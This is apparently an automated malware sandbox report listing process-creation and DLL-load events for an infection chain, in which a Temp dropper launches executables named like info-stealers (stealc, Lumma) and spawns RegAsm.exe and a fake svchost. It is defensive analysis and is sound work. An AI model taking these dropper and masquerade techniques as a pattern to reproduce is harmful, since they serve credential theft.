Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe "C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe "C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe "C:\Users\user\AppData\Local\Temp\1000254001\penis.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe "C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe "C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe "C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe "C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe "C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe "C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe "C:\Users\user\AppData\Roaming\esFzLrEqPw.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe "C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Process created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Process created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exe
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: esdsip.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: msisip.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: wshext.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: esdsip.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: ntmarta.dll
